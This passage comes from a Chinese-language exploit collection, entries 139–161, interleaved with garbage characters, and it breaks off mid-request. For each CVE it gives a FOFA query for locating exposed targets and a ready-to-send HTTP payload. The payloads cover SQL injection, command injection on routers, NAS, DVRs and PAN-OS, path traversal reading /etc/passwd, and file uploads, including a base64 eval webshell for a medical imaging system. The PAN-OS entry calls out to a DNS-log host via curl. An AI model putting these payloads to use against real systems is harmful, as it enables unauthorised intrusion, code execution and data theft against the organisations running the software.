n% k' M2 a+ ~/ l, H+ p139. 福建科立讯通信指挥调度平台editemedia.php sql注入# Y) k8 v/ x1 z* \
CVE-2024-26220 l# s8 n0 x2 a% e
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台". N: {* k- s' b+ b W* Z' T0 b
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1- ~/ A$ Z" _' A9 Y
Host: x.x.x.x0 ^; Q9 C' u7 w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0) k8 G; d! I5 x& W2 N
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.82 \3 P& a/ @9 U; `7 j
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! M/ B! c# X3 z) g h! t
Accept-Encoding: gzip, deflate, br
9 F! @% v! F {+ w( S! J& h+ dConnection: close
; z" ~- w5 _1 @: @3 G/ p) e. B5 OCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
& \- d. L2 C5 Z- l |( W$ wUpgrade-Insecure-Requests: 1
1 s7 w* `: _* Z0 k }
7 N0 R4 g a# `9 x
' U8 m2 x1 ~. {140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入' ^) ?, A$ y. F; x' a
CVE-2024-2566& A$ a4 G- J+ o$ n+ g8 A6 F
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"4 ^0 {/ F; v! f$ C3 Q
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1
4 \1 y1 k7 y5 a& V' EHost: x.x.x.x2 e' S, S7 i D/ P3 e& {5 W, J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
, H7 ~& I, Z7 q% yAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.83 U" l2 |/ b* `) x
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 k/ B8 b8 W* {6 ]
Accept-Encoding: gzip, deflate, br; G8 e$ `/ u5 G
Connection: close; f! n' y5 m9 m6 R; m
Cookie: authcode=h8g9
/ x( Q6 x0 G g4 [. q1 X4 L! yUpgrade-Insecure-Requests: 1, d3 `( I( y, }4 o
& f3 f4 j3 b+ R4 v5 M) C9 ~7 `; n5 g- o2 G
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
/ o7 c" r& Z4 Z zFOFA:body="指挥调度管理平台"8 w% ^6 q! O$ `5 I2 F3 |: {
POST /app/ext/ajax_users.php HTTP/1.1! N2 ?( P' T$ W( x+ ^! o! v: X
Host: your-ip
& j4 G+ B* H9 K2 ZUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
0 T! Q" \1 _/ R0 v% iContent-Type: application/x-www-form-urlencoded
x4 ]4 x: y- ?/ p0 R" f, `0 y$ P5 z& j( E/ P6 @
0 \0 D( S- K: v& ~dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
: ?2 a4 l+ d6 E/ Y6 x4 B! j, |$ f1 m. A" k# F
$ a- G! I- ^+ O z142. CMSV6车辆监控平台系统中存在弱密码1 W9 J2 J, [* e0 [
CVE-2024-29666$ j( H! N) [1 |7 u3 J3 E. k
FOFA:body="/808gps/"
4 F" ]1 b8 R* j% n8 oadmin/admin6 e- K6 b1 F+ c' S
143. Netis WF2780 v2.1.40144 远程命令执行4 {$ r" r; N! E7 }" H+ ?! C
CVE-2024-25850
: g2 `7 D; z! l8 L- i+ i5 P' MFOFA:title='AP setup' && header='netis'1 W2 G; H! v6 M9 \ q
PAYLOAD
3 _$ i% I) L: p. `
; S( u2 v; @4 h1 G144. D-Link nas_sharing.cgi 命令注入
8 i7 J0 K- R8 ?6 }' h: z+ m" ]FOFA:app="D_Link-DNS-ShareCenter"8 D' ~. p5 M( P$ U
system参数用于传要执行的命令! Q. o4 h# j0 F% h b, f
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
; [% q' D- H- C5 c3 y; I: ^Host: x.x.x.x H4 n) j e) Y6 a8 G& S G, |
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0$ Y4 r% _ Y, G: J
Connection: close2 s6 x* p" a9 |2 F; u
Accept: */*9 ?4 Y/ I, V3 { ^6 B! L& }
Accept-Language: en
5 f6 j( q4 n7 ~! t- }9 V6 }Accept-Encoding: gzip7 J6 H1 z) ]& B2 w; d
% d# U: N% d( }) ~- c( m
' n& G) n! a- w: x145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
$ j* D7 m/ n7 ~. C6 HCVE-2024-34003 i8 r, Q! y) r9 J1 x7 J
FOFA:icon_hash="-631559155"! p, m& ?1 \# z' z# M' [
GET /global-protect/login.esp HTTP/1.1
. \; |6 ?( @ U8 jHost: 192.168.30.112:1005
0 x% O: S, Q; z; N' gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
+ Y1 x& X/ S* g, E% L0 w* \8 VConnection: close
4 y# g8 K, T' s8 w# f4 Z& JCookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;9 L7 u& m/ r7 P7 A
Accept-Encoding: gzip, x! ?4 y) S$ I+ w" R" H
5 _6 W% d- w5 A
( ^5 t* {0 g( n# O5 P' o6 g6 O146. MajorDoMo thumb.php 未授权远程代码执行
7 A1 L, X# H* S; s# q& _! QCNVD-2024-02175
8 z. R/ z4 g3 C2 @FOFA:app="MajordomoSL"
+ Q$ \$ T0 P3 N2 U. rGET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1 l6 G! A5 k V% H" A
Host: x.x.x.x( e$ L4 E" ]% X( p7 Q0 m6 y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.842 f* F/ f* u8 R) f) \1 }
Accept-Charset: utf-8
' }1 N2 u1 P( }+ [8 E$ {Accept-Encoding: gzip, deflate* M# u- b6 u- L& E- [( ~( c
Connection: close9 Z1 n$ Z: l6 {. H2 p& G
& |# D: j u+ L/ y! {1 j# P0 e. S9 T6 s) Q
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
4 \* U! f7 p" l$ R' PCVE-2024-32399
+ C0 J& E D" k, }FOFA:body="RaidenMAILD"5 G, a/ B2 a, J6 ^. X" u
GET /webeditor/../../../windows/win.ini HTTP/1.10 D# H T- Q0 \+ Q
Host: 127.0.0.1:81
; p* a3 I7 z% K; R( T6 X: [" j0 K/ _Cache-Control: max-age=0
1 C3 P1 n/ c$ k- o" M; JConnection: close! d4 c" w* U4 _' x) t
/ w1 i3 a7 {% Z+ `8 U
( S6 ] D/ B8 P& e2 {4 ^. P( k: a9 ?- K148. CrushFTP 认证绕过模板注入
/ O9 B5 x7 g6 i; Q" ^) MCVE-2024-4040
9 K: Q# q6 y! ~* Q# |FOFA:body="CrushFTP"6 V% Q( m+ C. _; Y4 m3 T
PAYLOAD! @; W6 P' ?9 K$ D
" v- t* r4 m/ _
149. AJ-Report开源数据大屏存在远程命令执行
1 ?- J/ w, ~. V4 g! w! vFOFA:title="AJ-Report"( |6 G/ r; m* x$ R
* \6 k( S/ O" s. |: n$ W/ G0 s" F( R3 Q5 lPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1' Z6 F) ]9 H ^
Host: x.x.x.x- ^8 J9 s9 Q! y0 S1 H+ I, z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36- E g7 R" S0 S) [
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.77 v5 i! f/ r' A
Accept-Encoding: gzip, deflate, br5 Q' l; K; y2 c( q d! E5 ~
Accept-Language: zh-CN,zh;q=0.9' E5 Y- m* ^" j0 ~" _* _
Content-Type: application/json;charset=UTF-8
% W: }; {/ I; {$ PConnection: close! V# w2 S/ U* y u, |
+ w6 G6 e7 u, ?# u4 q! S, h* B+ s{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
1 \$ I2 Z$ ]4 l$ B( ?) R& \# l0 R. Q
150. AJ-Report 1.4.0 认证绕过与远程代码执行* o$ [! M7 G) S8 S: l1 F* K6 _
FOFA:title="AJ-Report"
3 q6 y5 u+ A ]/ w6 X7 r/ S! W: _1 }POST /dataSetParam/verification;swagger-ui/ HTTP/1.17 q( s% w, M- P
Host: x.x.x.x
# e7 b( ^7 w& ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
7 V7 l9 @+ [6 x0 l- ^, c% x: ^) ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ \+ Q' }: x7 @7 s4 ^! C' V
Accept-Encoding: gzip, deflate, br9 V3 [9 \6 ]1 {1 J. x; J
Accept-Language: zh-CN,zh;q=0.9' q& E4 N, k( u
Content-Type: application/json;charset=UTF-85 C( ]) x/ B: W& ]' ^* Q: J5 _
Connection: close
+ x) q0 |) e+ @+ kContent-Length: 339
j" ~% ~5 k5 b: _" z p* P; V# L; c5 `( Y
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}4 `) z7 j2 C* B' t7 r
' E# g$ ?2 I9 k5 X* _4 q
0 K: l# `2 G5 `5 W' ^151. AJ-Report 1.4.1 pageList sql注入" r- y2 C+ g4 U3 L
FOFA:title="AJ-Report"
" `8 _ B: S8 ]7 \GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
9 Z9 R% s, d9 {; M1 B/ b6 S% BHost: x.x.x.x
9 F$ w5 I+ T {4 k9 VUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
" Z+ ~5 R; X. p) t# e% ZConnection: close
, z* r( ?- Z% c9 e: OAccept-Encoding: gzip
! V: ^' {# D! V* J* j4 m2 `0 `. C X+ C0 s* u; [
9 W: p* `. c0 q& J; A1 W6 l
152. Progress Kemp LoadMaster 远程命令执行
2 a( [! n8 \" Q( V Y1 x7 J! uCVE-2024-12126 w$ L9 A8 b# U& t }
LoadMaster <= 7.2.59.2 (GA)7 t8 y3 C+ O+ K0 R
LoadMaster<=7.2.54.8 (LTSF)
3 J4 a; X2 ~+ D# lLoadMaster <= 7.2.48.10 (LTS)
0 U5 l2 Z$ `9 \5 z# E: }FOFA:body="LoadMaster"& v5 Q" L; {8 q
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码! f% {" Q' f3 M* h# D
GET /access/set?param=enableapi&value=1 HTTP/1.1( o: C; r+ c) c; Q. f
Host: x.x.x.x
/ D5 l- `1 k/ H1 x9 z/ LUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1' {5 | l7 w! r& U, c3 d! I
Connection: close
+ ~0 m9 t/ n5 P @- fAccept: */*
- V" w! ^ }% k2 W* a3 V8 IAccept-Language: en
4 a. d0 M4 s+ [$ B ZAuthorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI= {" m9 v- N" G
Accept-Encoding: gzip
- {6 h/ F h! f3 w9 I* ~' B+ |. i3 |+ @4 C+ O, {! e
/ p. q1 {% G. H" S153. gradio任意文件读取$ H) G& U2 U2 C* ^7 D) d
CVE-2024-1561FOFA:body="__gradio_mode__"
; e1 q* H, r) U8 J, N e ~4 Q第一步,请求/config文件获取componets的id
, H5 T d5 T3 {: ^7 o. ]1 ahttp://x.x.x.x/config6 g9 T: o5 M. Y4 @3 O' j
" G% W' _' \+ r+ `% e, x* C( i/ k' ~# a7 g1 ]5 H9 ]6 T
第二步,将/etc/passwd的内容写入到一个临时文件- r, h4 y7 _ N" C+ A: A9 ~* y5 p
POST /component_server HTTP/1.1
+ v) C! Q* F/ V. N6 @+ NHost: x.x.x.x
- _6 Z' p# K: f, q- E" M" uUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
" N- Q# V. e3 h1 e6 I$ IConnection: close1 m% ]- t9 T- |! T Q5 e
Content-Length: 115+ ?, r6 R9 W+ v8 B% f" X
Content-Type: application/json) I! ~; m7 _( w/ C
Accept-Encoding: gzip* v0 R0 I. O" n: @! V& h; X9 y
7 n+ S: W% o, t
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
$ C% a$ x: F# M2 T1 d. @: s) i3 q/ c
* | L7 l; o- Q2 k" R" J
0 K8 f2 V% @/ g0 ^* C. `3 U& x第三步访问
7 \1 u+ R. K* E# C+ m# V) [0 `http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
$ v) ?* h5 q* Z" o3 G4 F& Q
. [: u1 \& [4 ]; I$ F7 I
& D$ A2 p7 X/ Q154. 天维尔消防救援作战调度平台 SQL注入3 C/ s: {3 z7 {' b
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"+ v( t% ?/ z2 j: ~( u0 s) y' y/ ?
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
9 D6 {" \! E7 m2 FHost: x.x.x.x
. @ R% [5 L% x2 SContent-Length: 106
+ T7 N& o! x/ c; K4 K u) W0 fCache-Control: max-age=0( n# P3 Q1 A( `3 E" j" o9 e G
Upgrade-Insecure-Requests: 1
! W. u( P) ^* ? D& DOrigin: http://x.x.x.x
* K7 f8 }! p, z( nContent-Type: application/json' t; E' U& A; F: }( e& ^3 s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
* d; ~' M4 h3 l; R2 nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7. m5 O$ K' Y. Q5 C; I" @1 j& z# q) X5 A
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
( v9 w7 }2 j+ bAccept-Encoding: gzip, deflate
" f( a( ^* Q# C+ K2 Q/ d. `Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.75 x! X D! M d, Q/ M
Connection: close l5 ~7 l# D4 ~. c) K2 s- y
# ?* D; [+ Y$ ]& [" v3 x
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
5 g+ G1 z' W" M/ t$ O$ Q }9 e, ?# J3 Y7 w
' X- Y5 l6 h! e7 W1 j5 u155. 六零导航页 file.php 任意文件上传0 r) |+ s* ~: s/ z' S7 D
CVE-2024-34982
" X6 i5 t. b+ e$ qFOFA:title=="上网导航 - LyLme Spage"
( O9 O3 j+ L0 [7 hPOST /include/file.php HTTP/1.1
$ K* F7 }& k3 S; kHost: x.x.x.x+ y$ X# C, _! ~- y0 Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.06 {1 G# L/ t/ U5 l; ?7 ^! N+ W7 g" `% Z( ]
Connection: close
. \8 o; Z/ A- AContent-Length: 232& m# ?, T2 q: W1 \* F2 O, t
Accept: application/json, text/javascript, */*; q=0.01
; r: [3 u7 Z* E! n% ~: T) [( o% ^Accept-Encoding: gzip, deflate, br
9 \: k7 B( z4 P5 D; J% i& b9 y! f4 LAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 }- _' @/ G- z- q' R
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f7 T" a6 r- D" g3 x
X-Requested-With: XMLHttpRequest
9 @! [% O. U7 ]+ R ~$ p- ]2 H m) x' C6 J' i( x+ D
-----------------------------qttl7vemrsold314zg0f- H' E2 }* l$ A
Content-Disposition: form-data; name="file"; filename="test.php"
/ E z) J" X2 J+ [Content-Type: image/png3 w5 O' t* F) a1 m
M. J2 V) s- x8 a<?php phpinfo();unlink(__FILE__);?>! k- x" I5 ?" c3 O/ x" A
-----------------------------qttl7vemrsold314zg0f--
) F2 s+ Y/ x8 W0 y3 d" Y" N" M) U
9 e# s: X+ O6 M7 P访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
5 U2 Q9 X* B5 Q. Q# B. R
' u& {# z* c, }2 b; f9 M* r156. TBK DVR-4104/DVR-4216 操作系统命令注入
/ W1 F- v( I7 h/ mCVE-2024-3721
% K; c' Q4 W# j6 B- u3 m+ IFOFA:"Location: /login.rsp"
5 h7 f: g- g% o/ E6 D7 |* v·TBK DVR-4104
- k6 E3 n: `0 @: C4 n·TBK DVR-4216& b" p3 o3 ^( z, W1 a" P& ?, u
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
# h- H8 v* P8 E, |) B1 Q( S
2 s% m8 s" o! j/ ^6 q- ~5 k* q9 y" B% s2 y
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
" ~, ~) o" [' Z" j8 f: \Host: x.x.x.x! p2 D0 K5 e% }8 ^$ s% i6 B
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15, c4 e% [5 J6 Z& r
Connection: close% s( K, b' G2 w# q/ E- x* F8 P
Content-Length: 01 D4 ?, \6 e( F4 j* P9 r% y
Cookie: uid=1
' n) B( k1 I5 r6 j/ Z, ~3 m0 @ kAccept-Encoding: gzip0 F. |3 V6 g- W4 I @2 I
% I1 L3 ]4 Z w# Q. r4 Q
3 f& i& p9 O& i/ a( f157. 美特CRM upload.jsp 任意文件上传
% C( l6 F5 z% [CNVD-2023-06971" D6 z6 t) k% n4 G) v
FOFA:body="/common/scripts/basic.js"
) v0 C* @) S% Q/ s4 s* kPOST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1 R, Z' \. }9 U: R/ ]* J( u
Host: x.x.x.x( L2 d- C3 W$ E& G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
" O1 p" r6 J+ @# Q" GContent-Length: 709
2 E8 N+ x( \* W0 g4 hAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
3 y7 H( Z! m! F; y4 Y! U# Q0 PAccept-Encoding: gzip, deflate
0 P! H4 @/ W/ l# f$ \Accept-Language: zh-CN,zh;q=0.9: L: f* M* {/ n" ?
Cache-Control: max-age=0" _# g* `3 O- d0 ]
Connection: close
( k4 R. g- _# X7 |$ A! B5 nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN5 h7 R% O3 |3 |# I
Upgrade-Insecure-Requests: 14 @ ~' w. G6 Z) u; O
3 j, `2 y/ k9 H8 a5 P$ r. b------WebKitFormBoundary1imovELzPsfzp5dN
0 ?! i8 O, r+ V. N2 NContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp" W/ Y: f. ^0 X
Content-Type: application/octet-stream/ T0 F9 S- i1 e
; `1 J- L* Q1 E8 P/ Cnyhelxrutzwhrsvsrafb* }( E0 q( R1 h
------WebKitFormBoundary1imovELzPsfzp5dN) A3 E1 R) u6 ?5 k! S
Content-Disposition: form-data; name="key"- n0 c; `( c- u% C! Z3 C" Z
/ j5 f. x+ z) q5 V* s
null8 ?+ y" Y9 M" q/ }( H
------WebKitFormBoundary1imovELzPsfzp5dN* \* }% o, d' L) @" I, m2 c6 J
Content-Disposition: form-data; name="form"' M% [8 u& X& a4 P
" V; F/ ~1 Z z: Anull
5 J$ _3 h- d7 A------WebKitFormBoundary1imovELzPsfzp5dN
1 y, z: [: P& h& x5 r8 E' ?Content-Disposition: form-data; name="field"! w% D, K6 \5 J* @
- X& T8 _8 |# S# p% Anull
9 T; L$ b. P8 a------WebKitFormBoundary1imovELzPsfzp5dN8 F+ G/ U. B) h5 W) ~
Content-Disposition: form-data; name="filetitile"
+ l+ T: F1 P1 \- P) N( Q/ P4 j! w+ z0 p8 U& S7 i
null
/ n" w% h( p2 k& E h------WebKitFormBoundary1imovELzPsfzp5dN% D9 z9 P" ]7 c+ C. j
Content-Disposition: form-data; name="filefolder"3 E' |$ L/ u# D' q) L, f: H
9 Y) r+ i2 Q6 C; ^" Y
null5 S( x" m4 N( d; L8 \, K
------WebKitFormBoundary1imovELzPsfzp5dN--
, y* i2 m% e9 w) j) J0 Y% q+ ]# d+ W+ `- @; G& n
$ Z- Q! h3 S' whttp://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp% F& l Q3 z: J" X! N, n, e
: N$ Q! t5 m2 p) a( Q158. Mura-CMS-processAsyncObject存在SQL注入
( R2 @" i' W' P) J9 \% e5 PCVE-2024-32640" `) ]( F9 s% Z% U
FOFA:"Generator: Masa CMS"3 M: ~$ t4 W' M. m; `% u
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
3 n/ ^& s3 w; u0 DHost: {{Hostname}}
; I9 U+ y* h( g6 R$ l+ ~Content-Type: application/x-www-form-urlencoded
. o& N, Q+ O7 |# z: } P) }
9 u3 `: ~ Q: Q7 C! l' n5 Q& dobject=displayregion&contenthistid=x\'&previewid=1
9 p# h8 @0 w/ l7 B* g. K" V1 j* t
9 ?9 d) B& u0 S9 g6 G$ a0 i2 o% |( u/ e
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
7 n% I$ z2 }- Q1 d+ K" c- sFOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")9 ~- F; ~- R+ O7 b" T& _: j
POST /webservices/WebJobUpload.asmx HTTP/1.1
; M @6 o; f0 u( J' YHost: x.x.x.x4 G$ Y+ x' Z4 Y" M: A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
6 S# J) R( W# h) L1 R X; UContent-Length: 10802 H8 N: {5 H) q" Y( n( u9 T H
Accept-Encoding: gzip, deflate7 h" s7 ]' l6 x" `' h6 A
Connection: close3 K, r* g5 K- }) C. `1 s8 F6 h( Q
Content-Type: text/xml; charset=utf-8' q( z: Y" y& S, b8 M6 g
Soapaction: "http://rainier/jobUpload"
5 e4 \4 \9 [4 G6 U
' K. X3 _% R# a8 P8 r t. n8 S<?xml version="1.0" encoding="utf-8"?>
* F o* G7 H g' n _3 k: B) b<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
# ?+ d4 E6 n+ M' D; l1 a<soap:Body>
* r: h- T# w$ p1 q<jobUpload xmlns="http://rainier">9 }# Q; z4 ?: ?
<vcode>1</vcode>
6 T# _5 d2 `+ w: [: L<subFolder></subFolder>$ \- J0 }) E3 w6 K
<fileName>abcrce.asmx</fileName>
4 |2 _7 G' s/ s/ I* e<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
2 a2 ^& [. ]4 O; m% {' ?</jobUpload>, J! }% d. k2 S& S {6 Z+ g0 z
</soap:Body>
$ e |9 M: O' ~</soap:Envelope>
! `6 F; \: ], J* @3 }" ^7 J# r4 o7 p5 ]9 q8 t* N5 r3 K
& m5 R6 U: L% T& O& T, m
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")5 |& h& ?& j. k. E' Q" n
. ?1 C% R* q, n2 A
, a/ Q: V/ h* Q$ q
160. Sonatype Nexus Repository 3目录遍历与文件读取. x0 |6 O* b- V; I" v- @
CVE-2024-4956
2 y1 _, G. o( vFOFA:title="Nexus Repository Manager"
& }+ }: I% K8 s6 h8 nGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
/ B+ @% G* s% ]1 G. eHost: x.x.x.x
! x S) c7 u* I. `+ |User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0# M @' s+ T; H9 y6 P5 ^, u
Connection: close A6 {8 O5 ~+ `
Accept: */*
3 \1 E( |5 g8 n/ H- t0 u/ g# AAccept-Language: en2 D& H3 S1 F$ _' _8 x
Accept-Encoding: gzip& |2 A5 p, X" p$ j; v3 p* W0 L- E
6 v2 M) L5 Z5 V, e5 _( |
* W$ Z0 B7 E) m161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传7 y2 B$ n% W# L+ u* t
FOFA:body="/KT_Css/qd_defaul.css"; x0 D; K" _" J0 Y5 f# l
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密
6 B4 W* X6 }- m# R: OPOST /Webservice.asmx HTTP/1.18 L0 t+ m4 ^0 d' @) {; X4 ^
Host: x.x.x.x
2 q0 M+ c" D. L EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
6 j, z ~; t0 t) B( n. Y* vConnection: close* |* E- |, b& N
Content-Length: 4450 H0 E% h8 T. v3 n8 I
Content-Type: text/xml, F! G4 p$ r h% k0 A' o" C! \
Accept-Encoding: gzip
8 T$ T3 d2 t/ K% n
$ o1 m' l6 `7 s% |5 y9 b8 I$ m<?xml version="1.0" encoding="utf-8"?>/ p" H) [! C1 K' D
<soap:Envelope xmlns:xsi="
6 u6 `- |. F5 q- u( \4 Dhttp://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
6 h1 o. ]8 o8 t$ k1 Axmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">- u7 Y# z3 ~0 h) ^ ~% |- B$ K
<soap:Body>/ C+ K; q! W7 C/ d; S
<UploadResume xmlns="http://tempuri.org/">
8 z; Q% M& C$ C* J. y9 ]) O/ N. g<ip>1</ip>1 |6 P' B% |' e: ~% Z, V/ ^. L
